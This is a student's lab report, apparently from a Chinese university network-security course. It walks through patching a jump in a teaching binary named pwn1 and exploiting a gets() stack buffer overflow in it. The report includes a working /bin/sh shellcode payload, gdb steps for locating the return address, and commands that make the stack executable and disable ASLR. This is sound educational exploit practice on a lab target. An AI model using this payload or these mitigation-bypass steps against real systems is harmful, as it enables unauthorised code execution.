20212937 曾俊铭 网络攻防实验报告

20212937 曾俊铭 2021-2022-2 《网络攻防实践》实践报告

1.实践内容

实践目标:

本次实践的对象是一个名为pwn1的linux可执行文件。

  • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 注入一个自己制作的shellcode并运行这段shellcode。

实验要求

  • 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
  • 掌握反汇编与十六进制编程器
  • 能正确修改机器指令改变程序执行流程
  • 能正确构造payload进行bof攻击

2.实践过程

2.1手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数

  • 通过云班课下载上传文件pwn1,打开Kali,输入命令“objdump -d pwn1”对该文件进行反汇编。
    image

  • 对以上反汇编结果进行分析:这里是三个函数main、getshell、foo。首先看main函数的调用情况,找到“80484b5: e8 d7 ff ff ff call 8048491 ”这一行,“call 8048491 ”是汇编指令,其含义是调用地址为8048491的foo函数,“e8 d7 ff ff ff”是机器指令,e8的含义是“跳转”,EIP(Extended Instruction Pointer,扩展指令指针)值指的是下一条指令的地址:80484ba,这条机器指令的意思是转而执行下一条位于地址80484ba的指令。由于main函数调用foo函数的机器指令为“e8 d7 ff ff ff”,所以要想调用getshell函数,只需把“d7 ff ff f”f改为getShell-80484ba对应的补码即可,因为47d-ba得到补码为c3 ff ff ff,因此main函数调用getshell函数的机器指令为“e8 c3 ff ff ff”。

  • 更改可执行文件,将call指令的目标地址由原来的“d7 ff ff ff”改为“c3 ff ff ff”。输入命令“vim pwn1”开始更改。
    image

  • 输入指令“:%! xxd”,回车,将显示模式切换为16进制模式:
    image

  • 找到这一行,先点击Ctrl+I进入插入模式,将“e8 d7”改为“e8 c3”。然后点击Esc,输入:wq保存并退出。 image

  • 输入指令“:%! xxd -r”将十六进制模式改回原格式,保存并退出
    image

2.2利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数

2.2.1反汇编,了解程序的基本功能

  • 将pwn1反汇编后查看foo函数,该函数的功能是调用gets读进用户输入的字符串然后用puts函数将字符串输出,但是该函数并没有检查用户输入,所以存在BOF漏洞。
  • 观察反汇编出的汇编代码得知预留的局部变量的空间为0x38,而gets函数将读取到的字符串存放到0x1c(28个字节)处,根据堆栈结构,当输入字符串长度达到36时,第33~36个字节将会覆盖到EIP中
    image

2.2.2确定输入字符串的那几个字符会覆盖返回地址

  • “apt install gdb”安装,输入命令“gdb pwn1”调式程序。
    image

  • 输入“r”,表示运行这个文件,输入有规律的字符串“1111111122222222333333334444444455555555”,程序输出该字符串,报错“Segmentation fault”,原因是输入超过28个,程序无法正常退出,产生溢出
    image

2.2.3确认用什么值覆盖返回地址

  • 使用gdb对pwn1进行调试,当输入长度为40的字符串“1111111122222222333333334444444455555555”后出现段错误,查看各寄存器状态可以发现当前EIP寄存器的内容为0x35353535(“5”的ASCLL码的十六进制为35),因此可以说明当输入字符串过长时,第33~36个字节将会覆盖EIP的内容
    image

2.3注入一个自己制作的shellcode并运行这段shellcode

  • 把prelink_0.0.20130503.orig.tar放到kali虚拟机中,在虚拟机中解压缩,在解压缩文件中打开终端
    输入命令行:
    sudo apt-get install libelf-dev
    ./configure
    make
    sudo make install

  • 准备一段Shellcode,shellcode是一段机器指令(code)

首先使用“apt-get install execstack”命令安装execstack

输入execstack -s pwn1设置堆栈可执行;

输入execstack -q pwn1查询文件的堆栈是否可执行

输入more /proc/sys/kernel/randomize_va_space查询是否关闭地址随机

输入echo "0" > /proc/sys/kernel/randomize_va_space关闭地址随机化

输入“more /proc/sys/kernel/randomize_va_space”查询是否关闭地址随机化
image

  • 构造要注入的payload。输入命令perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode进行注入,其中,前32个A是用来填满缓冲区buf,“\x04\x03\x02\x01”是预留的返回地址retaddr。
    image

  • 然后在该终端运行(cat input_shellcode;cat) | ./pwn1注入这段攻击buf,打开另一个终端,运行ps -ef | grep pwn,可以看到pwn的进程21016。
    image

  • 用gdb的attach 21016命令,启动gdb调试这个进程。
    image

  • 用disassemble foo命令反汇编,设置断点查看注入buf的内存地址。
    image

  • 输入b *0x080484ae命令设置断点,输入c命令(continue)继续运行。
    image

  • 在进程正在运行的终端敲回车,使其继续执行
    image

  • 再返回调试终端,输入info r esp命令查找地址为x/16x 0xffffd5bc
    image

  • 输入x/16x 0xffffd5bc命令查看其存放内容,看到了0x01020304,就是返回地址的位置。根据我们构造的input_shellcode可知,shellcode就在其后,x/16x 0xffffd5bc+0x00000004=0xffffd5c0,所以地址应为0xffffd5c0
    image

  • 接下来只需要将之前的\x4\x3\x2\x1改为这个地址0xffffd5c0即可,用命令perl -e 'print "A" x 32;print "\xc0\xd5\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode。
    image

  • 再用(cat input_shellcode;cat) | ./pwn1命令次执行程序,攻击成功
    image

3.学习中遇到的问题及解决

  • 问题1:kali一直找不到prelink所在目录?
  • 问题1解决方案:将prlink下载在主机安装后在拖入虚拟机kali

4.实践总结

通过这次实验自己对机器指令、十六进制、反汇编、gdb调试和BOF攻击等安全知识有了进一步的了解学习,并进行了简单的应用,对于后面的学习打下了基础,实验有一点复杂,但更多的还是理论基础,希望能进一步学习吧。

posted on 2022-05-13 21:48  曾俊铭  阅读(223)  评论(0编辑  收藏  举报

导航